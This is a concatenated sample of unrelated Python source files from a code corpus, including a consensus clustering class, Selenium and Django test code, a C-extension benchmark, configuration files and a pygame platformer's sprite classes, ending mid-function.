Obtains n_components kmeans clustering, compute the coincidence matrix and applies kmeans to that coincidence
matrix
:param X:
:return:
"""
baseclust = []
for i in range(self.n_components):
ncl = self.n_clusters_base if self.ncb_rand else randint(2, self.n_clusters_base+1)
if self.base == 'kmeans':
km = KMeans(n_clusters=ncl, n_init=1, init='random')
elif self.base == 'spectral':
km = SpectralClustering(n_clusters=ncl, assign_labels='discretize',
affinity='nearest_neighbors', n_neighbors=30)
km.fit(X)
baseclust.append(km.labels_)
coin_matrix = np.zeros((X.shape[0], X.shape[0]))
for l in baseclust:
for i in range(X.shape[0]):
coin_matrix[i, i] += 1
for j in range(i+1, X.shape[0]):
#if i != j:
if l[i] == l[j]:
coin_matrix[i, j] += 1
coin_matrix[j, i] += 1
coin_matrix /= self.n_components
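        # An equivalent vectorized form of the nested accumulation loop above
        # (a sketch, not in the original source), including the diagonal counts:
        #     for l in baseclust:
        #         coin_matrix += (l[:, None] == l[None, :])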
        if self.consensus2 == 'kmeans':
            kmc = KMeans(n_clusters=self.n_clusters, n_jobs=-1)
            kmc.fit(coin_matrix)
            return kmc.cluster_centers_, kmc.labels_
        elif self.consensus2 == 'spectral':
            kmc = SpectralClustering(n_clusters=self.n_clusters, assign_labels='discretize',
                                     affinity='nearest_neighbors', n_neighbors=40)
            kmc.fit(coin_matrix)
            return None, kmc.labels_
if __name__ == '__main__':
    from sklearn import datasets
    from sklearn.metrics import adjusted_mutual_info_score
    from kemlglearn.datasets import make_blobs
    import matplotlib.pyplot as plt
    # data = datasets.load_iris()['data']
    # labels = datasets.load_iris()['target']
    # data, labels = make_blobs(n_samples=[100, 200], n_features=2, centers=[[1,1], [0,0]], random_state=2, cluster_std=[0.2, 0.4])
    data, labels = datasets.make_circles(n_samples=400, noise=0.1, random_state=4, factor=0.3)
    km = KMeans(n_clusters=2)
    cons = SimpleConsensusClustering(n_clusters=2, n_clusters_base=20, n_components=50, ncb_rand=False)
    lkm = km.fit_predict(data)
    cons.fit(data)
    lcons = cons.labels_
    print(adjusted_mutual_info_score(lkm, labels))
    print(adjusted_mutual_info_score(lcons, labels))
    fig = plt.figure()
    # ax = fig.gca(projection='3d')
    # pl.scatter(X[:, 1], X[:, 2], zs=X[:, 0], c=ld.labels_, s=25)
    #
    ax = fig.add_subplot(131)
    plt.scatter(data[:, 0], data[:, 1], c=labels)
    ax = fig.add_subplot(132)
    plt.scatter(data[:, 0], data[:, 1], c=lkm)
    ax = fig.add_subplot(133)
    plt.scatter(data[:, 0], data[:, 1], c=lcons)
    plt.show()
|
StarcoderdataPython
|
211373
|
import re
import quopri
class SignupHelper:
    def __init__(self, app):
        self.app = app
    def new_user(self, username, email, password):
        wd = self.app.wd
        wd.get(self.app.config['web']['baseUrl'] + "/signup_page.php")
        wd.find_element_by_name("username").click()
        wd.find_element_by_name("username").clear()
        wd.find_element_by_name("username").send_keys(username)
        wd.find_element_by_name("email").click()
        wd.find_element_by_name("email").clear()
        wd.find_element_by_name("email").send_keys(email)
        wd.find_element_by_xpath("//input[@type='submit']").click()
        mail = self.app.mail.get_mail(username, password, '[MantisBT] Account registration')
        url = self.extract_confirmation_url(mail)
        wd.get(url)
        wd.find_element_by_name("realname").click()
        wd.find_element_by_name("realname").clear()
        wd.find_element_by_name("realname").send_keys(username)
        wd.find_element_by_name("password").click()
        wd.find_element_by_name("password").clear()
        wd.find_element_by_name("password").send_keys(password)
        wd.find_element_by_name("password_confirm").click()
        wd.find_element_by_name("password_confirm").clear()
        wd.find_element_by_name("password_confirm").send_keys(password)
        wd.find_element_by_xpath("//button[@type='submit']").click()
    def extract_confirmation_url(self, text):
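        # The registration mail arrives quoted-printable encoded, so decode it
        # before searching for the confirmation link.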
        body = quopri.decodestring(text).decode('utf-8')
        return re.search("http://.*", body).group(0)
|
StarcoderdataPython
|
1661456
|
class Biblioteca:
    def chama_metodo_interface(self):
        self.metodo_interface()
|
StarcoderdataPython
|
371488
|
<reponame>BigShuang/Sort-Animation
#!/usr/bin/env python
# -*- coding: utf-8 -*-
FPS = 60  # game frame rate
QUICKFPS = 60
SLOWFPS = 15
WIN_WIDTH = 800  # window width
WIN_HEIGHT = 980  # window height
BUBBLE_SPACE = 40
INIT_R = 10
DR = 4
NUMBER = 10
COLORS = {
    "bg": (240, 255, 255),  # background color
    "bubble": (135, 206, 235),
    # "select": (135, 206, 235),
    "select": (0, 139, 139),
    "current": (0, 0, 0),
    "line": (0, 139, 139),
    # "line": (173, 216, 230),
}
|
StarcoderdataPython
|
5072290
|
"""
A Python parser for Org mode files.
"""
__all__ = ['OrgTree', 'orgTreeFromFile'] # Seems equal to the stuff in ".tree" below
from .tree import OrgTree, orgTreeFromFile
from . import const, utils
|
StarcoderdataPython
|
3264627
|
<filename>RecoBTag/Combined/test/writeGBRForests_cfg.py
import FWCore.ParameterSet.Config as cms
process = cms.Process("writeGBRForests")
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)  # NB: needs to be set to 1 so that GBRForestWriter::analyze method gets called exactly once
)
process.source = cms.Source("EmptySource")
process.load('Configuration/StandardSequences/Services_cff')
process.gbrForestWriter = cms.EDAnalyzer("GBRForestWriter",
    jobs = cms.VPSet(
        cms.PSet(
            inputFileName = cms.FileInPath('RecoBTag/Combined/data/CombinedMVAV2_13_07_2015.weights.xml.gz'),
            inputFileType = cms.string("XML"),
            inputVariables = cms.vstring("Jet_CSV", "Jet_CSVIVF", "Jet_JP", "Jet_JBP", "Jet_SoftMu", "Jet_SoftEl"),
            spectatorVariables = cms.vstring(),
            methodName = cms.string("BDT"),
            outputFileType = cms.string("SQLLite"),
            outputRecord = cms.string("btag_CombinedMVAv2_BDT_TMVAv420_74X_v1")
        )
    )
)
process.load("CondCore.DBCommon.CondDBCommon_cfi")
process.CondDBCommon.connect = 'sqlite_file:btag_CombinedMVAv2_BDT_TMVAv420_GBRForest_74X_v1.db'
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
    process.CondDBCommon,
    timetype = cms.untracked.string('runnumber'),
    toPut = cms.VPSet(
        cms.PSet(
            record = cms.string('btag_CombinedMVAv2_BDT_TMVAv420_74X_v1'),
            tag = cms.string('btag_CombinedMVAv2_BDT_TMVAv420_74X_v1'),
            label = cms.untracked.string('btag_CombinedMVAv2_BDT')
        )
    )
)
process.p = cms.Path(process.gbrForestWriter)
|
StarcoderdataPython
|
5008607
|
<gh_stars>0
import turtle
class Score:
    def __init__(self, coordinates, font):
        self.__count = 0
        self.__coordinates = coordinates
        self.__font = font
        self.__pen = turtle.Turtle()
    def init_score(self):
        self.__pen.goto(*self.__coordinates)
        self.__pen.hideturtle()
        self.__pen.color('white')
        self.__pen.write(self.__count, font=self.__font)
    def change_and_write_score(self):
        self.__count += 1
        self.__pen.clear()
        self.__pen.write(self.__count, font=self.__font)
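# Usage sketch (illustrative coordinates and font, not from the original source):
#   score = Score(coordinates=(0, 260), font=("Courier", 24, "normal"))
#   score.init_score()
#   score.change_and_write_score()  # increments the count and redraws it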
|
StarcoderdataPython
|
100679
|
import itertools
from unittest import skip
from django.core import urlresolvers
from rest_framework.test import APIClient, APIRequestFactory
from rest_framework.test import APITestCase, force_authenticate
from api.tests.factories import (
    UserFactory, AnonymousUserFactory, IdentityFactory, ProviderFactory, AllocationSourceFactory,
    UserAllocationSourceFactory
)
from api.v2.views import AllocationSourceViewSet as ViewSet
class AllocationSourceTests(APITestCase):
    def setUp(self):
        self.anonymous_user = AnonymousUserFactory()
        self.user_without_sources = UserFactory.create(username='test-username')
        self.user_with_sources = UserFactory.create(username='test-username-with-sources')
        self.provider = ProviderFactory.create()
        self.user_identity = IdentityFactory.create_identity(
            created_by=self.user_without_sources,
            provider=self.provider)
        self.user_identity = IdentityFactory.create_identity(
            created_by=self.user_with_sources,
            provider=self.provider)
        self.allocation_source_1 = AllocationSourceFactory.create(name='TG-TRA110001',
                                                                  compute_allowed=1000)
        self.allocation_source_2 = AllocationSourceFactory.create(name='TG-TRA220002',
                                                                  compute_allowed=2000)
        self.allocation_source_3 = AllocationSourceFactory.create(name='TG-TRA330003',
                                                                  compute_allowed=3000)
        UserAllocationSourceFactory.create(user=self.user_with_sources, allocation_source=self.allocation_source_1)
        UserAllocationSourceFactory.create(user=self.user_with_sources, allocation_source=self.allocation_source_2)
    def test_can_create_allocation_source(self):
        """Can I even create an allocation source?"""
        client = APIClient()
        client.force_authenticate(user=self.user_without_sources)
        allocation_source = AllocationSourceFactory.create(name='TG-TRA990001',
                                                           compute_allowed=9000)
        expected_values = {
            'name': 'TG-TRA990001',
            'compute_allowed': 9000
        }
        self.assertDictContainsSubset(expected_values, allocation_source.__dict__)
    def test_anonymous_user_cant_see_allocation_sources(self):
        request_factory = APIRequestFactory()
        list_view = ViewSet.as_view({'get': 'list'})
        url = urlresolvers.reverse('api:v2:allocationsource-list')
        self.assertEqual(url, '/api/v2/allocation_sources')
        request = request_factory.get(url)
        force_authenticate(request, user=self.anonymous_user)
        response = list_view(request)
        self.assertEqual(response.status_code, 403)
        self.assertEqual(response.status_text, 'Forbidden')
    def test_loggedin_user_with_no_sources_cant_see_allocation_sources(self):
        request_factory = APIRequestFactory()
        list_view = ViewSet.as_view({'get': 'list'})
        url = urlresolvers.reverse('api:v2:allocationsource-list')
        self.assertEqual(url, '/api/v2/allocation_sources')
        request = request_factory.get(url)
        force_authenticate(request, user=self.user_without_sources)
        response = list_view(request)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.status_text, 'OK')
        self.assertEqual(response.data['count'], 0)
    def test_loggedin_user_can_list_allocation_sources(self):
        request_factory = APIRequestFactory()
        list_view = ViewSet.as_view({'get': 'list'})
        url = urlresolvers.reverse('api:v2:allocationsource-list')
        self.assertEqual(url, '/api/v2/allocation_sources')
        request = request_factory.get(url)
        force_authenticate(request, user=self.user_with_sources)
        response = list_view(request)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.status_text, 'OK')
        expected_values = [
            {
                'name': 'TG-TRA110001',
                'compute_allowed': 1000
            },
            {
                'name': 'TG-TRA220002',
                'compute_allowed': 2000
            }
        ]
        self.assertEqual(response.data['count'], len(expected_values))
        for allocation_source, expected_dict in itertools.izip_longest(expected_values, response.data['results']):
            self.assertDictContainsSubset(allocation_source, expected_dict)
    @skip('TODO: Figure out why it fails')
    def test_loggedin_user_can_get_allocation_source(self):
        request_factory = APIRequestFactory()
        retrieve_view = ViewSet.as_view({'get': 'retrieve'})
        url = urlresolvers.reverse('api:v2:allocationsource-detail', args=(self.allocation_source_1.id,))
        self.assertEqual(url, '/api/v2/allocation_sources/{}'.format(self.allocation_source_1.id))
        request = request_factory.get(url)
        force_authenticate(request, user=self.user_with_sources)
        response = retrieve_view(request)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.status_text, 'OK')
|
StarcoderdataPython
|
3592535
|
<filename>backend/notifications/forms.py
from django import forms
from django.utils.safestring import mark_safe
class NewsletterForm(forms.Form):
    email = forms.EmailField(label="Email Address")
class ContactForm(forms.Form):
    name = forms.CharField(label="Name", max_length=255)
    email = forms.EmailField(label="Email Address")
    message = forms.CharField(label="Your Message", widget=forms.Textarea)
    substack_sign_up = forms.BooleanField(
        label=mark_safe('<span class="italic">Sign me up for David\'s newsletter!</span>'), required=False, initial=True
    )
|
StarcoderdataPython
|
3513139
|
from .lightning import Lightning
from .customer import Customer
from .onchain import Onchain
from .wallet import Wallet
from .base import webhook_verification
|
StarcoderdataPython
|
9604874
|
import random
import os
import time
import capnp
import matplotlib.pyplot as plt
import numpy as np
from dist_zero import cgen
def test_pass_buffer_c_to_python():
    program = cgen.Program(name='simple_buffer_perf_test')
    globalBuf = program.AddDeclaration(cgen.Char.Star().Var('global_buffer'))
    nGlobalBufBytes = 10 * 1000 * 1000
    initGlobalBuf = program.AddExternalFunction(name='InitGlobalBuf', args=None)
    initGlobalBuf.AddAssignment(globalBuf, cgen.malloc(cgen.Constant(nGlobalBufBytes)).Cast(cgen.Char.Star()))
    index = initGlobalBuf.AddDeclaration(cgen.MachineInt.Var('index'), cgen.Zero)
    loop = initGlobalBuf.AddWhile(index < cgen.Constant(nGlobalBufBytes))
    loop.AddAssignment(globalBuf.Sub(index), cgen.Constant(120))
    loop.AddAssignment(index, index + cgen.One)
    initGlobalBuf.AddReturn(cgen.PyBool_FromLong(cgen.Constant(1)))
    vSize = cgen.Int32.Var('size')
    f = program.AddExternalFunction(name='F', args=[vSize])
    f.AddReturn(cgen.PyBytes_FromStringAndSize(globalBuf, vSize))
    # f.AddReturn(cgen.PyMemoryView_FromMemory(globalBuf, vSize, cgen.Zero))
    mod = program.build_and_import()
    # Initialize the global buffer
    mod.InitGlobalBuf()
    def test_i(i):
        n_samples = 200
        start = time.time()
        for x in range(n_samples):
            start = time.time()
            bs = mod.F(i)
            if len(bs) != i:
                raise RuntimeError("Bad length")
            if bs[2:3] != b'x':
                raise RuntimeError("Bad char")
        duration = time.time() - start
        return duration / n_samples
    xs, ys = [], []
    for i in range(100, 5000 * 1000, 10000):
        print(f"testing {i}")
        xs.append(i / 1000000)
        ys.append(test_i(i) * 1000000)
    fig, ax = plt.subplots()
    ax.plot(xs, ys)
    ax.set(xlabel='size of buffer (megabytes)', ylabel='time to pass and receive from c extension (microseconds)')
    plt.show()
def test_pass_buffer_python_to_c():
    program = cgen.Program(name='simple_buffer_perf_test')
    vArgs = cgen.PyObject.Star().Var('args')
    f = program.AddExternalFunction(name='F', args=None)
    vBuf = f.AddDeclaration(cgen.UInt8.Star().Var('buf'))
    vBuflen = f.AddDeclaration(cgen.MachineInt.Var('buflen'))
    whenParseFail = f.AddIf(
        cgen.PyArg_ParseTuple(vArgs, cgen.StrConstant("s#"), vBuf.Address(), vBuflen.Address()).Negate()).consequent
    whenParseFail.AddReturn(cgen.PyLong_FromLong(cgen.Constant(0)))
    resultBuf = cgen.PyObject.Star().Var('result')
    f.AddReturn(cgen.PyLong_FromLong(vBuflen))
    mod = program.build_and_import()
    buffers = [''.join('x' for x in range(i * 7000)).encode('utf-8') for i in range(10, 5000, 180)]
    def test_buf(buf):
        n_samples = 200
        start = time.time()
        for i in range(n_samples):
            flen = mod.F(buf)
            if len(buf) != flen:
                raise RuntimeError("Bad length")
        duration = time.time() - start
        return duration / n_samples
    fig, ax = plt.subplots()
    xs, ys = [], []
    print('running tests')
    for buf in buffers:
        buflen = len(buf) / 1000000
        buftime = 1000000 * test_buf(buf)
        xs.append(buflen)
        ys.append(buftime)
        print(f'finished test of size {buflen}')
    ax.plot(xs, ys)
    ax.set(xlabel='size of buffer (megabytes)', ylabel='time to pass and receive from c extension (microseconds)')
    plt.show()
if __name__ == '__main__':
    # test_pass_buffer_python_to_c()
    test_pass_buffer_c_to_python()
|
StarcoderdataPython
|
6659121
|
"""Define tests for the QNAP QSW init."""
from unittest.mock import patch
from homeassistant.components.qnap_qsw.const import DOMAIN
from homeassistant.config_entries import ConfigEntryState
from homeassistant.core import HomeAssistant
from .util import CONFIG
from tests.common import MockConfigEntry
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload."""
config_entry = MockConfigEntry(
domain=DOMAIN, unique_id="qsw_unique_id", data=CONFIG
)
config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.qnap_qsw.QnapQswApi.validate",
return_value=None,
), patch(
"homeassistant.components.qnap_qsw.QnapQswApi.update",
return_value=None,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
assert config_entry.state is ConfigEntryState.LOADED
await hass.config_entries.async_unload(config_entry.entry_id)
await hass.async_block_till_done()
assert config_entry.state is ConfigEntryState.NOT_LOADED
|
StarcoderdataPython
|
5079878
|
# i used some ideas from CodePylet https://www.youtube.com/watch?v=osDofIdja6s&t=1038s
# i also borrowed pretty much all of this from kids can code - thanks!
# on acceleration https://www.khanacademy.org/science/physics/one-dimensional-motion/kinematic-formulas/v/average-velocity-for-constant-acceleration
# on vectors: https://www.youtube.com/watch?v=ml4NSzCQobk
# I used a lot of different aspects of code from Mr. Cozort
# I got a lot of information from https://www.pygame.org/docs/
import pygame as pg
from pygame.sprite import Sprite
import random
from random import randint, randrange, choice
from settings import *
vec = pg.math.Vector2
class Spritesheet:
    # class for loading and parsing sprite sheets
    def __init__(self, filename):
        self.spritesheet = pg.image.load(filename).convert()
    def get_image(self, x, y, width, height, scalefactor):
        image = pg.Surface((width, height))
        image.blit(self.spritesheet, (0, 0), (x, y, width, height))
        image = pg.transform.scale(image, (width // scalefactor, height // scalefactor))
        return image
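# Usage sketch (the filename and coordinates here are hypothetical):
#   sheet = Spritesheet('spritesheet_jumper.png')
#   img = sheet.get_image(0, 288, 380, 94, 2)  # grab a 380x94 region at half size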
class Player(Sprite):
    def __init__(self, game):
        # allows layering in LayeredUpdates sprite group - thanks pygame!
        self._layer = PLAYER_LAYER
        # add player to game groups when instantiated
        self.groups = game.all_sprites
        Sprite.__init__(self, self.groups)
        self.game = game
        self.walking = False
        self.jumping = False
        self.current_frame = 0
        self.last_update = 0
        self.load_images()
        self.image = self.standing_frames[0]
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.center = (WIDTH / 2, HEIGHT / 2)
        self.pos = vec(WIDTH / 2, HEIGHT / 2)
        self.vel = vec(0, 0)
        self.acc = vec(0, 0)
        print("adding vecs " + str(self.vel + self.acc))
    def load_images(self):
        # Loads the player images based on whether or not the player has bought the purple bunny
        if self.game.boughtpurple == False:
            self.standing_frames = [self.game.spritesheet.get_image(690, 406, 120, 201, 3),
                                    self.game.spritesheet.get_image(614, 1063, 120, 191, 3)
                                    ]
            for frame in self.standing_frames:
                frame.set_colorkey(BLACK)
            self.walk_frames_r = [self.game.spritesheet.get_image(678, 860, 120, 201, 3),
                                  self.game.spritesheet.get_image(692, 1458, 120, 207, 3)
                                  ]
            self.walk_frames_l = []
            for frame in self.walk_frames_r:
                frame.set_colorkey(BLACK)
                self.walk_frames_l.append(pg.transform.flip(frame, True, False))
            self.jump_frame = self.game.spritesheet.get_image(382, 763, 150, 181, 3)
            self.jump_frame.set_colorkey(BLACK)
        if self.game.boughtpurple == True:
            self.standing_frames = [self.game.spritesheet.get_image(581, 1265, 121, 191, 3),
                                    self.game.spritesheet.get_image(584, 0, 121, 201, 3)
                                    ]
            for frame in self.standing_frames:
                frame.set_colorkey(BLACK)
            self.walk_frames_r = [self.game.spritesheet.get_image(584, 203, 121, 201, 3),
                                  self.game.spritesheet.get_image(678, 651, 121, 207, 3)
                                  ]
            self.walk_frames_l = []
            for frame in self.walk_frames_r:
                frame.set_colorkey(BLACK)
                self.walk_frames_l.append(pg.transform.flip(frame, True, False))
            self.jump_frame = self.game.spritesheet.get_image(416, 1660, 150, 181, 3)
            self.jump_frame.set_colorkey(BLACK)
    def update(self):
        self.animate()
        self.acc = vec(0, PLAYER_GRAV)
        keys = pg.key.get_pressed()
        # If b is pressed and you already bought bubble and it is not on cooldown: then it instantiates a bubble
        if keys[pg.K_b] and self.game.boughtbubble == True and self.game.bubblecooldown == 0:
            Bubble(self.game, self)
            self.game.bubblecooldown = 1000
        # The speed the player goes depends on which sprite the player has bought: The purple one being faster
        if keys[pg.K_a] or keys[pg.K_LEFT]:
            if self.game.boughtpurple == False:
                self.acc.x = -PLAYER_ACC
            if self.game.boughtpurple == True:
                self.acc.x = -0.8
        if keys[pg.K_d] or keys[pg.K_RIGHT]:
            if self.game.boughtpurple == False:
                self.acc.x = PLAYER_ACC
            if self.game.boughtpurple == True:
                self.acc.x = 0.8
        # set player friction
        self.acc.x += self.vel.x * PLAYER_FRICTION
        # equations of motion
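        # per-frame displacement follows the kinematic formula
        # d = v*t + 0.5*a*t**2 with t = 1 frame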
        self.vel += self.acc
        if abs(self.vel.x) < 0.1:
            self.vel.x = 0
        self.pos += self.vel + 0.5 * self.acc
        # jump to other side of screen
        if self.pos.x > WIDTH + self.rect.width / 2:
            self.pos.x = 0 - self.rect.width / 2
        if self.pos.x < 0 - self.rect.width / 2:
            self.pos.x = WIDTH + self.rect.width / 2
        self.rect.midbottom = self.pos
    # cuts the jump short when the space bar is released
    def jump_cut(self):
        if self.jumping:
            if self.vel.y < -5:
                self.vel.y = -5
    def jump(self):
        print("jump is working")
        # check pixel below
        self.rect.y += 2
        hits = pg.sprite.spritecollide(self, self.game.platforms, False)
        # adjust based on checked pixel
        self.rect.y -= 2
        # only allow jumping if player is on platform
        if hits and not self.jumping:
            # play sound only when space bar is hit and while not jumping
            self.game.jump_sound[choice([0, 1])].play()
            # tell the program that player is currently jumping
            self.jumping = True
            self.vel.y = -PLAYER_JUMP
            print(self.acc.y)
    def animate(self):
        # gets time in milliseconds
        now = pg.time.get_ticks()
        if self.vel.x != 0:
            self.walking = True
        else:
            self.walking = False
        # Changes frames of player to imitate animation
        if self.walking:
            if now - self.last_update > 200:
                self.last_update = now
                self.current_frame = (self.current_frame + 1) % len(self.walk_frames_l)
                bottom = self.rect.bottom
                if self.vel.x > 0:
                    self.image = self.walk_frames_r[self.current_frame]
                else:
                    self.image = self.walk_frames_l[self.current_frame]
                self.rect = self.image.get_rect()
                self.rect.bottom = bottom
        # checks state
        if not self.jumping and not self.walking:
            # gets current delta time and checks against 200 milliseconds
            if now - self.last_update > 200:
                self.last_update = now
                self.current_frame = (self.current_frame + 1) % len(self.standing_frames)
                # reset bottom for each frame of animation
                bottom = self.rect.bottom
                self.image = self.standing_frames[self.current_frame]
                self.rect = self.image.get_rect()
                self.rect.bottom = bottom
class Cloud(Sprite):
    def __init__(self, game):
        # allows layering in LayeredUpdates sprite group
        self._layer = CLOUD_LAYER
        # add clouds to game groups when instantiated
        self.groups = game.all_sprites, game.clouds
        Sprite.__init__(self, self.groups)
        self.game = game
        # Randomly chooses a cloud image to use
        self.image = choice(self.game.cloud_images)
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        scale = randrange(50, 101) / 100
        self.image = pg.transform.scale(self.image, (int(self.rect.width * scale),
                                                     int(self.rect.height * scale)))
        self.rect.x = randrange(WIDTH - self.rect.width)
        self.rect.y = randrange(-500, -50)
        self.speed = randrange(1, 3)
    def update(self):
        if self.rect.top > HEIGHT * 2:
            self.kill()
        ''' mr cozort added animated clouds and made it so they
        restart on the other side of the screen'''
        self.rect.x += self.speed
        if self.rect.x > WIDTH:
            self.rect.x = -self.rect.width
class Platform(Sprite):
    def __init__(self, game, x, y):
        # allows layering in LayeredUpdates sprite group
        self._layer = PLATFORM_LAYER
        # add Platforms to game groups when instantiated
        self.groups = game.all_sprites, game.platforms
        Sprite.__init__(self, self.groups)
        self.game = game
        # Changes platform skin based on how high the player score is
        if game.score < 500:
            images = [self.game.spritesheet.get_image(0, 288, 380, 94, 2), self.game.spritesheet.get_image(213, 1662, 201, 100, 2)]
        elif game.score < 1000:
            images = [self.game.spritesheet.get_image(0, 768, 380, 94, 2), self.game.spritesheet.get_image(213, 1764, 201, 100, 2)]
        elif game.score < 2000:
            images = [self.game.spritesheet.get_image(0, 576, 380, 94, 2), self.game.spritesheet.get_image(218, 1456, 201, 100, 2)]
        if game.score >= 2000:
            images = [self.game.spritesheet.get_image(0, 96, 380, 94, 2), self.game.spritesheet.get_image(382, 408, 200, 100, 2)]
        self.image = random.choice(images)
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = y
        # Spawns coins and enemies on platform
        if random.randrange(100) < COIN_SPAWN_PCT:
            Coin(self.game, self)
        elif random.randrange(100) < MOB2_SPAWN_PCT:
            Mob2(self.game, self)
            print("Mob2 is working")
# I made this
class Coin(Sprite):
    def __init__(self, game, plat):
        # allows layering in LayeredUpdates sprite group
        self._layer = COIN_LAYER
        # add a groups property where we can pass all instances of this object into game groups
        self.groups = game.all_sprites, game.coins
        Sprite.__init__(self, self.groups)
        self.game = game
        self.plat = plat
        self.load_frames()
        self.image = self.turning_frames[0]
        self.current_frame = 0
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.centerx = self.plat.rect.centerx
        self.rect.bottom = self.plat.rect.top - 5
        self.last_update = 0
        self.descendanim = False
    def update(self):
        self.animate()
        self.rect.bottom = self.plat.rect.top - 5
        # checks to see if plat is in the game's platforms group so we can kill the powerup instance
        if not self.game.platforms.has(self.plat):
            self.kill()
    def load_frames(self):
        # loads animation frames
        self.turning_frames = [self.game.spritesheet.get_image(698, 1931, 84, 84, 2),
                               self.game.spritesheet.get_image(829, 0, 66, 84, 2),
                               self.game.spritesheet.get_image(897, 1574, 50, 84, 2),
                               self.game.spritesheet.get_image(645, 651, 15, 84, 2)]
        for frame in self.turning_frames:
            frame.set_colorkey(BLACK)
    def animate(self):
        now = pg.time.get_ticks()
        # creates a back and forth type of animation that makes it look like it's spinning
        if self.current_frame == 3:
            self.descendanim = True
        if self.current_frame == 0:
            self.descendanim = False
        if now - self.last_update > 150:
            self.last_update = now
            # added values for the rect.centerx accommodate for off center sprite formatting
            # elif format allows for a single if statement to pass at one time, which makes it display one frame at a time and animate correctly
            if self.current_frame == 0 and self.descendanim == False:
                self.current_frame = 1
                self.image = self.turning_frames[self.current_frame]
                self.rect.centerx = self.plat.rect.centerx + 4.5
            elif self.current_frame == 1 and self.descendanim == False:
                self.current_frame = 2
                self.image = self.turning_frames[self.current_frame]
                self.rect.centerx = self.plat.rect.centerx + 8.5
            elif self.current_frame == 2 and self.descendanim == False:
                self.current_frame = 3
                self.image = self.turning_frames[self.current_frame]
                self.rect.centerx = self.plat.rect.centerx + 17.25
            elif self.current_frame == 3 and self.descendanim == True:
                self.current_frame = 2
                self.image = pg.transform.flip(self.turning_frames[self.current_frame], True, False)
                self.rect.centerx = self.plat.rect.centerx + 8.5
            elif self.current_frame == 2 and self.descendanim == True:
                self.current_frame = 1
                self.image = pg.transform.flip(self.turning_frames[self.current_frame], True, False)
                self.rect.centerx = self.plat.rect.centerx + 4.5
            elif self.current_frame == 1 and self.descendanim == True:
                self.current_frame = 0
                self.image = pg.transform.flip(self.turning_frames[self.current_frame], True, False)
                self.rect.centerx = self.plat.rect.centerx
class Mob(Sprite):
    def __init__(self, game):
        # allows layering in LayeredUpdates sprite group
        self._layer = MOB_LAYER
        # add a groups property where we can pass all instances of this object into game groups
        self.groups = game.all_sprites, game.mobs
        Sprite.__init__(self, self.groups)
        self.game = game
        self.image_up = self.game.spritesheet.get_image(566, 510, 122, 139, 3)
        self.image_up.set_colorkey(BLACK)
        self.image_down = self.game.spritesheet.get_image(568, 1534, 122, 135, 3)
        self.image_down.set_colorkey(BLACK)
        self.image = self.image_up
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.centerx = choice([-100, WIDTH + 100])
        self.rect_top = self.rect.top
        self.vx = randrange(1, 4)
        if self.rect.centerx > WIDTH:
            self.vx *= -1
        self.rect.y = randrange(HEIGHT / 2)
        self.vy = 0
        self.dy = 0.5
    def update(self):
        self.rect.x += self.vx
        self.vy += self.dy
        self.rect_top = self.rect.top
        if self.vy > 3 or self.vy < -3:
            self.dy *= -1
        center = self.rect.center
        if self.dy < 0:
            self.image = self.image_up
        else:
            self.image = self.image_down
        self.rect.center = center
        self.rect_top = self.rect.top
        self.rect.y += self.vy
        if self.rect.left > WIDTH + 100 or self.rect.right < -100:
            self.kill()
# I made this
class Mob2(Sprite):
    def __init__(self, game, plat):
        # allows layering in LayeredUpdates sprite group
        self._layer = MOB_LAYER
        # add a groups property where we can pass all instances of this object into game groups
        self.groups = game.all_sprites, game.mobs
        Sprite.__init__(self, self.groups)
        self.game = game
        # assigns it to a platform
        self.plat = plat
        self.load_images()
        self.image = self.walkright[0]
        self.image.set_colorkey(BLACK)
        self.rect = self.image.get_rect()
        self.rect.centerx = self.plat.rect.centerx
        self.rect.bottom = self.plat.rect.top
        self.vx = 1
        self.currentframe = 1
        self.last_update = 0
    def update(self):
        # Keeps the Mob2 from going outside the boundaries of the platform
        if self.rect.right == self.plat.rect.right:
            self.vx = -1
        if self.rect.left == self.plat.rect.left:
            self.vx = 1
        self.animate()
        # makes the mob move left and right
        self.rect.x = self.rect.x + self.vx
        # moves the mob with the platform
        self.rect.bottom = self.plat.rect.top
        # kills the mob along with the platform
        if self.rect.bottom + 5 >= HEIGHT:
            self.kill()
    def animate(self):
        now = pg.time.get_ticks()
        # creates walking animation based on direction of walking
        if now - self.last_update > 150:
            self.last_update = now
            if self.vx == 1:
                if self.currentframe == 1:
                    self.currentframe = 0
                    self.image = self.walkright[self.currentframe]
                elif self.currentframe == 0:
                    self.currentframe = 1
                    self.image = self.walkright[self.currentframe]
            elif self.vx == -1:
                if self.currentframe == 1:
                    self.currentframe = 0
                    self.image = self.walkleft[self.currentframe]
                elif self.currentframe == 0:
                    self.currentframe = 1
                    self.image = self.walkleft[self.currentframe]
    def load_images(self):
        # loads animation frames
        self.walkright = [self.game.spritesheet.get_image(704, 1256, 120, 159, 3),
                          self.game.spritesheet.get_image(812, 296, 90, 155, 3)
                          ]
        for frame in self.walkright:
            frame.set_colorkey(BLACK)
        self.walkleft = [pg.transform.flip(self.walkright[0], True, False),
                         pg.transform.flip(self.walkright[1], True, False)
                         ]
        for frame in self.walkleft:
            frame.set_colorkey(BLACK)
# I made this
class Bubble(Sprite):
def __init__(self, game, play1):
# allows layering in LayeredUpdates sprite group
self._layer = BUBBLE_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.game = game
self.groups = game.all_sprites, game.bubbles
Sprite.__init__(self, self.groups)
self.player = play1
self.image = self.game.spritesheet.get_image(0, 1662, 211, 215, 2).convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = self.player.rect.center
        # adds transparency: knock out the black colorkey pixels, then multiply
        # the alpha channel down to a translucent value
        alpha = 70
        pixels = pg.PixelArray(self.image)
